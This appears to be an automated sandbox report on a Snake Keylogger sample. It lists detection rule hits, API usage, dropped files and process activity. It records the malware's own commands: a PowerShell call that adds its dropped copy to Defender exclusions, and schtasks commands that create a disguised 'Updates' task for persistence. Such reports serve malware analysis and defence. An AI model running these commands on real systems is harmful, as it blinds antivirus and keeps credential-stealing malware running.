                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 6360, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: lyNyKapwZJLKnn.exe PID: 7260, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2i3Lj7a8Gk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: lyNyKapwZJLKnn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, ---2.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, ---2.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, -B--.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, KexrhkrD0V06LqILWv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, DuMROSxCmqfhBtrcL3.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, DuMROSxCmqfhBtrcL3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, DuMROSxCmqfhBtrcL3.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, KexrhkrD0V06LqILWv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, DuMROSxCmqfhBtrcL3.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, DuMROSxCmqfhBtrcL3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, DuMROSxCmqfhBtrcL3.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, KexrhkrD0V06LqILWv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, DuMROSxCmqfhBtrcL3.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, DuMROSxCmqfhBtrcL3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, DuMROSxCmqfhBtrcL3.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/11@5/4
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeFile created: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3448:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeFile created: C:\Users\user\AppData\Local\Temp\tmp760C.tmpJump to behavior
                  Source: 2i3Lj7a8Gk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 2i3Lj7a8Gk.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 2i3Lj7a8Gk.exeReversingLabs: Detection: 79%
                  Source: 2i3Lj7a8Gk.exeVirustotal: Detection: 41%
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeFile read: C:\Users\user\Desktop\2i3Lj7a8Gk.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\2i3Lj7a8Gk.exe "C:\Users\user\Desktop\2i3Lj7a8Gk.exe"
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp760C.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess created: C:\Users\user\Desktop\2i3Lj7a8Gk.exe "C:\Users\user\Desktop\2i3Lj7a8Gk.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp8686.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess created: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess created: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess created: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp760C.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess created: C:\Users\user\Desktop\2i3Lj7a8Gk.exe "C:\Users\user\Desktop\2i3Lj7a8Gk.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp8686.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess created: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess created: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess created: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: windows.staterepositoryps.dllJump to behavior
